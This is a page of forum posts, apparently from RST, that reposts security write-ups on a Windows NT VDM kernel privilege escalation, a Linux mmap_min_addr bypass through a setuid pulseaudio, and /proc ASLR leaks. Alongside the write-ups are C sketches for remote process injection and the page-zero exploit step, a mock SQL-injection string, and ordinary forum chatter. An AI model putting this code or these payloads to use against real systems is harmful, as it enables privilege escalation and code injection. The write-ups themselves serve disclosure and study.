  8. [h=3]CVE-2010-0232: Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack[/h]Thursday, January 21, 2010 Two days ago, Tavis Ormandy published one of the most interesting vulnerabilities I've seen so far. It's one of those rare but fascinating design-level errors dealing with low-level system internals. Its exploitation requires skills and ingenuity. The vulnerability lies in Windows' support for Intel's hardware 8086 emulation (virtual-8086, or VM86) and is believed to have been there since Windows NT 3.1 (1993!), making it 17 years old. It uses two tricks that we have already published on this blog before, the #GP on pre-commit handling failure and the forging of cs:eip in VM86 mode. This was intended to be mentioned in our talk at PacSec about virtualization this past November, but Tavis had agreed with Microsoft to postpone the release of this advisory. Tavis was kind enough to write a blog post about it; you can read it below:
From Tavis Ormandy: I've just published one of the most interesting bugs I've ever encountered, a simple authentication check in Windows NT that can incorrectly let users take control of the system. The bug exists in code hidden deep enough inside the kernel that it's gone unnoticed for as long as NT has existed. If you've ever tried to run an MS-DOS or Win16 application on a modern NT machine, the chances are it worked. This is an impressive feat: these applications were written for a completely different execution environment and operating system, and yet still work today and run at almost native speed. The secret that makes this possible behind the scenes is Virtual-8086 mode. Virtual-8086 mode is a hardware emulation facility built into all x86 processors since the i386, and allows modern operating systems to run 16-bit programs designed for real mode with very little overhead. These 16-bit programs run in a simulated real mode environment within a regular protected mode task, allowing them to co-exist in a modern multitasking environment. Support for Virtual-8086 mode requires a monitor, the collective name for the software that handles any requests the program makes. These requests range from handling sensitive instructions to mapping low-level services onto system calls and are implemented partially in kernel mode and partially in user mode. In Windows NT, the user mode component is called the NTVDM subsystem, and it interacts with the kernel via a native system service called NtVdmControl. NtVdmControl is unusual because it's authenticated: only authorised programs are permitted to access it, which is enforced using a special process flag called VdmAllowed that the kernel verifies is present before NtVdmControl will perform any action; if you don't have this flag, the kernel will always return STATUS_ACCESS_DENIED. The bug we're talking about today involves how BIOS service calls are handled, which are a low-level way of interacting with the system that's needed to support real-mode programs. The kernel implements BIOS service calls in two stages; the second stage begins when the interrupt handler for general protection faults (often shortened to #GP in technical documents) detects that the system has completed the first stage.
The details of how BIOS service calls are implemented are unimportant; what is important is that the two stages must be perfectly synchronised. If the kernel transitions to the second stage incorrectly, a hostile user can take advantage of this confusion to take control of the kernel and compromise the system. In theory, this shouldn't be a problem: Microsoft implemented a check that verifies that the trap occurred at a magic address (actually, a cs:eip pair) that unprivileged users can't reach. The check seems reasonable at first: the hardware guarantees that unprivileged code can't arbitrarily make itself more privileged without a special request, and even if it could, only authorised programs are permitted to use NtVdmControl() anyway. Unfortunately, it turns out these assumptions were wrong. The problem I noticed was that although unprivileged code cannot make itself more privileged arbitrarily, Virtual-8086 mode makes testing the privilege level of code more difficult because the segment registers lose their special meaning. This is because in protected mode the segment registers (particularly ss and cs) can be used to test privilege level, whereas in Virtual-8086 mode they're used to create far pointers, which allow 16-bit programs to access the 20-bit real address space. However, I still couldn't abuse this fact because NtVdmControl() can only be accessed by authorised programs, and there's no other way to request pathological operation on Virtual-8086 mode tasks. I was able to solve this problem by invoking the real NTVDM subsystem, and then loading my own code inside it using a combination of CreateRemoteThread(), VirtualAllocEx() and WriteProcessMemory(). Finally, I needed to find a way to force the kernel to transition to the vulnerable code while my process appeared to be privileged. My solution to this was to make the kernel fault when returning to user mode from kernel mode, thus creating the appearance of a legitimate trap for the fabricated execution context that I had installed. These steps all fit together perfectly, and can be used to convince the kernel to execute my code, giving me complete control of the system.
Conclusion
Could Microsoft have avoided this issue? It's difficult to imagine how: errors like this will generally elude fuzz testing (in order to observe any problem, a fuzzer would need to guess a 46-bit magic number, as well as set up an intricate process state, not to mention the VdmAllowed flag), and any static analysis would need an incredibly accurate model of the Intel architecture. The code itself was probably resistant to manual audit; it's remained fairly static throughout the history of NT, and is likely considered forgotten lore even inside Microsoft. In cases like this, security researchers are sometimes in a better position than those with the benefit of documentation and source code: all abstraction is stripped away and we can study what remains without being tainted by how documentation claims something is supposed to work. If you want to mitigate future problems like this, reducing attack surface is always the key to security. In this particular case, you can use group policy to disable support for Application Compatibility (see the Application Compatibility policy template), which will prevent unprivileged users from accessing NtVdmControl(), certainly a wise move if your users don't need MS-DOS or Windows 3.1 applications.
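As a side note, the CreateRemoteThread()/VirtualAllocEx()/WriteProcessMemory() combination Tavis mentions is a standard Windows injection pattern. A generic, hedged sketch of that step (the target PID and payload are placeholders, and none of the VDM-specific setup is shown):

/* Generic sketch: copy a payload into another process and run it there. */
#include <windows.h>

BOOL inject(DWORD pid, const unsigned char *payload, SIZE_T len)
{
        HANDLE proc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
                                  PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION,
                                  FALSE, pid);
        if (!proc)
                return FALSE;

        /* Reserve executable memory in the target and copy the payload in. */
        LPVOID remote = VirtualAllocEx(proc, NULL, len,
                                       MEM_COMMIT | MEM_RESERVE,
                                       PAGE_EXECUTE_READWRITE);
        if (!remote || !WriteProcessMemory(proc, remote, payload, len, NULL)) {
                CloseHandle(proc);
                return FALSE;
        }

        /* Run the copied code in the context of the target process. */
        HANDLE th = CreateRemoteThread(proc, NULL, 0,
                                       (LPTHREAD_START_ROUTINE)remote,
                                       NULL, 0, NULL);
        if (th)
                CloseHandle(th);
        CloseHandle(proc);
        return th != NULL;
}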
Posted by Julien Tinnes at 7:48 AM Sursa: cr0 blog: CVE-2010-0232: Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
  9. [h=3]Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)[/h]Friday, June 26, 2009 EDIT3: Slashdot, the SANS Institute, Threatpost and others have a story about an exploit by Bradley Spengler which uses our technique to exploit a null pointer dereference in the Linux kernel. EDIT2: As of July 13th 2009, the Linux kernel integrates our patch (2.6.31-rc3). Our patch also made it into -stable. EDIT1: This is now referenced as a vulnerability and tracked as CVE-2009-1895. NULL pointer dereferences are a common security issue in the Linux kernel. In the realm of userland applications, exploiting them usually requires being able to somehow control the target's allocations until you get page zero mapped, and this can be very hard. In the paradigm of locally exploiting the Linux kernel, however, nothing (before Linux 2.6.23) prevented you from mapping page zero with mmap() and crafting it to suit your needs before triggering the bug in your process' context. Since the kernel's data and code segment both have a base of zero, a null pointer dereference would make the kernel access page zero, a page filled with bytes in your control. Easy. This used to not be the case back in Linux 2.0, when the kernel's data segment's base was above PAGE_OFFSET and the kernel had to explicitly use a segment override (with the fs selector) to access data in userland. The same rough idea is now used in PaX/GRSecurity's UDEREF to prevent exploitation of "unexpected to userland kernel accesses" (it actually makes use of an expand-down segment instead of a PAGE_OFFSET segment base, but that's a detail). Kernel developers tried to solve this issue too, but without resorting to segmentation (which is considered deprecated and is mostly not available on x86_64) and in a portable (cross-architecture) way. In 2.6.23, they introduced a new sysctl, called vm.mmap_min_addr, that defines the minimum address that you can request a mapping at. Of course, this doesn't solve the complete issue of "to userland pointer dereferences" and it also breaks the somewhat useful feature of being able to map the first pages (this breaks Dosemu for instance), but in practice this has been effective enough to make exploitation of many vulnerabilities harder or impossible. Recently, Tavis Ormandy and I had to exploit such a condition in the Linux kernel. We investigated a few ideas, such as:
- using brk()
- creating a MAP_GROWSDOWN mapping just above the forbidden region (usually 64K) and segfaulting the last page of the forbidden region
- obscure system calls such as remap_file_pages
- putting memory pressure in the address space to let the kernel allocate in this region
- using the MMAP_PAGE_ZERO personality
All of them without any luck at first. The LSM hook responsible for this security check was correctly called every time. So what does the default security module do in cap_file_mmap? This is the relevant code (in security/capability.c on recent versions of the Linux kernel):
if ((addr < mmap_min_addr) && !capable(CAP_SYS_RAWIO))
        return -EACCES;
return 0;
Meaning that a process with CAP_SYS_RAWIO can bypass this check. How can we get our process to have this capability? By executing a setuid binary of course! So we set the MMAP_PAGE_ZERO personality and execute a setuid binary. Page zero will get mapped, but the setuid binary is executing and we don't have control anymore. So, how do we get control back?
Using something such as "/bin/su our_user_name" could be tempting, but su drops privileges before giving us control back (it'd be a vulnerability otherwise!), so the Linux kernel will make the exec fail in the cap_file_mmap check (due to the MMAP_PAGE_ZERO personality). So what we need is a setuid binary that will give us control back without going through exec. We found such a setuid binary that is installed on many Desktop Linux machines by default: pulseaudio. pulseaudio will drop privileges and let you specify a library to load through its -L argument. Exactly what we needed! Once we have one page mapped in the forbidden area, it's game over. Nothing will prevent us from using mremap to grow the area and mprotect to change our access rights to PROT_READ|PROT_WRITE|PROT_EXEC. So this completely bypasses the Linux kernel's protection. Note that apart from this problem, the mere fact that MMAP_PAGE_ZERO is not in the PER_CLEAR_ON_SETID mask and thus is allowed when executing setuid binaries can be a security issue: being able to map page zero in a process with euid=0, even without controlling its content, could be useful when exploiting a null pointer vulnerability in a setuid application. We believe that the correct fix for this issue is to add MMAP_PAGE_ZERO to the PER_CLEAR_ON_SETID mask. PS: Thanks to Robert Swiecki for some help while investigating this. Posted by Julien Tinnes at 11:37 AM Sursa: cr0 blog: Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)
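A hedged sketch of the personality trick described in the post above; the module name passed to -L is a placeholder, and the in-library steps are only outlined in the trailing comment:

/* Set MMAP_PAGE_ZERO, then execute a setuid helper that loads our library
 * after dropping privileges (pulseaudio -L in the original write-up). */
#include <sys/personality.h>
#include <unistd.h>

int main(void)
{
        /* Ask the kernel to map page zero at the next exec. A setuid target
         * carries CAP_SYS_RAWIO, so the mmap_min_addr check in
         * cap_file_mmap() is satisfied. */
        personality(personality(0xffffffff) | MMAP_PAGE_ZERO);

        execlp("pulseaudio", "pulseaudio", "-L", "module-evil.so", (char *)NULL);
        return 1;   /* only reached if exec fails */
}

/* A constructor in the loaded library would then grow and re-protect the
 * zero page, e.g. with mremap() and mprotect(..., PROT_READ | PROT_WRITE |
 * PROT_EXEC), before triggering the kernel bug. */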
  10. [h=3]Local bypass of Linux ASLR through /proc information leaks[/h]Wednesday, April 22, 2009 EDIT2: Thanks to the efforts of Jake Edge, who noticed our presentation, the /proc/pid/stat information leak is now at least partially patched in the mainline kernel, since 2.6.27.23 EDIT1: This is featured in an LWN article by Jake Edge Tavis Ormandy and I talked about locally bypassing address space layout randomization (ASLR) in Linux in a lightning talk at CanSecWest. From Linux 2.6.12 to Linux 2.6.21, you could completely bypass ASLR when targeting local processes by reading /proc/pid/maps. Since Linux 2.6.22, if you cannot ptrace "pid", then you will see an empty /proc/pid/maps. It has been known for at least 7 years now that /proc/pid/stat and /proc/pid/wchan could also leak sensitive information. Reading this information has been prevented in GRSecurity since the beginning as well as in this patch. The question was: could you exploit this information to bypass ASLR in practice? If you want to find out, it's easy: we've just published the slides and Tavis' tool! Posted by Julien Tinnes at 4:21 PM Sursa: cr0 blog: Local bypass of Linux ASLR through /proc information leaks
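For context, this is the kind of read the slides are about: a small sketch that prints the startstack, kstkesp and kstkeip fields (numbers 28-30 in proc(5)) of /proc/<pid>/stat, which on kernels without the 2.6.27.23 fix are visible even for processes you cannot ptrace:

/* Print the stack and instruction pointer fields leaked by /proc/pid/stat. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
        char path[64], buf[4096];
        snprintf(path, sizeof(path), "/proc/%s/stat", argc > 1 ? argv[1] : "self");

        FILE *f = fopen(path, "r");
        if (!f)
                return 1;
        if (!fgets(buf, sizeof(buf), f)) {
                fclose(f);
                return 1;
        }
        fclose(f);

        /* comm (field 2) may contain spaces, so start parsing after the last ')'. */
        char *p = strrchr(buf, ')');
        if (!p)
                return 1;
        unsigned long startstack = 0, kstkesp = 0, kstkeip = 0;
        int i = 2;
        for (p = strtok(p + 2, " "); p; p = strtok(NULL, " ")) {
                ++i;
                if (i == 28) startstack = strtoul(p, NULL, 10);
                if (i == 29) kstkesp = strtoul(p, NULL, 10);
                if (i == 30) kstkeip = strtoul(p, NULL, 10);
        }
        printf("startstack=%#lx kstkesp=%#lx kstkeip=%#lx\n",
               startstack, kstkesp, kstkeip);
        return 0;
}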
  11. [h=3]History of memory corruption vulnerabilities and exploits[/h] I came across a great paper, “Memory Errors: The Past, the Present, and the Future” by van der Veen et al. The authors cover the history of memory corruption errors as well as exploitation and countermeasures. I think there are a number of interesting conclusions to draw from it. It seems that the number of flaws in common software is still much too high. Consider what’s required to compromise today’s most hardened consumer platforms, iOS and Chrome. You need a flaw in the default install that is useful and remotely accessible, a memory disclosure bug, a sandbox bypass (or several), and often a kernel or other privilege escalation flaw. Given a sufficiently small trusted computing base, it should be impossible to find this confluence of flaws. We clearly have too large a TCB today, since this combination of flaws has been found not once but multiple times in these hardened products. Other products that haven’t been hardened require even fewer flaws to compromise, making them more vulnerable even if they have the same rate of bug occurrence. The paper’s conclusion shows that if you want to prevent exploitation, your priority should be preventing stack, heap, and integer overflows (in that order). Stack overflows are by far still the most commonly exploited class of memory corruption flaws, out of proportion to their prevalence. We’re clearly not smart enough as a species to stop creating software bugs. It takes a Dan Bernstein to reason accurately about software in bite-sized chunks such as in qmail. It’s important to face this fact and make fundamental changes to process and architecture that will make the next 18 years better than the last. Download: http://www.isg.rhul.ac.uk/sullivan/pubs/raid-2012.pdf Sursa: History of memory corruption vulnerabilities and exploits | root labs rdist
  12. I found a "bridge" between Wordpress and vBulletin, but it doesn't work on this version. More precisely, it crashes the whole blog. I'll try to put together something "manual" for comments, but I don't know when. For now we'll leave it as it is and see how it goes.
  13. Nytro

    question

    ' or username=NUMELE_TAU_REAL/**/and/**/aDDreSS=ADRESA_TA_DE_ACASA Replace the uppercase placeholders (your real name and your home address) with your real data.
  14. 1. 6 (1 + 2 + 3) 2. RSTRSTRSTRST (when b reaches 0) 3. Hello world (a compatibility format for "old", i.e. ancient, keyboards) 4. You don't have "using namespace std;". Invalid lvalue...? 5. RST 6. It's 4 AM right now! And here I am writing a challenge for RST 7. 9 (2 + 3 + 4) 8. exit(0), RST (it no longer compiles, so it prints nothing) Meh
  15. Yes, that's the page we need: a design for it.
  16. As for history, I know very few people who have been active for at least 5-6 years. Speaking of which, is anyone willing to build a homepage? We only need the design; I'll handle the integration myself.
  17. Yes, I've thought about that. When I have some free time I'll write a more detailed article; I just hope I'll have the time...
  18. Hi, To round out the forum we've decided to open a blog: https://rstforums.com/blog/ The blog is purely informative; it will contain administrative announcements, short articles in Romanian and much more. More information: https://rstforums.com/blog/2013/03/23/blog-ul-rst/ Only staff members will post on the blog. If you have something nice that you think is worth posting, get in touch with someone from the staff. If there are any problems or suggestions, we're happy to hear them here. // RST
  19. Nytro

    Hello

    Goodbye.
  20. Don't risk it, there are a lot of scammers. I haven't tried and I won't try, but those are the losers who used to copy other people's exploits and claim them as their own: injector. If you want exploits it's simple: rent an exploit kit! And let me know if you do that
  21. When you call another network you hear a "beep" that warns you that "you may be charged extra".
  22. www.youtube.com/watch?v=Z1eX1vEgiRQ
  23. Info: Call 544 and find out whether your phone is tapped: Can intelligence officers be caught "in the act"? Who authorizes their wiretaps
  24. Yes, I think it was a game, from Steam if I remember right. I mean, I don't know if it actually involved OpenGL; I think it wasn't OpenGL they had optimized but that particular game...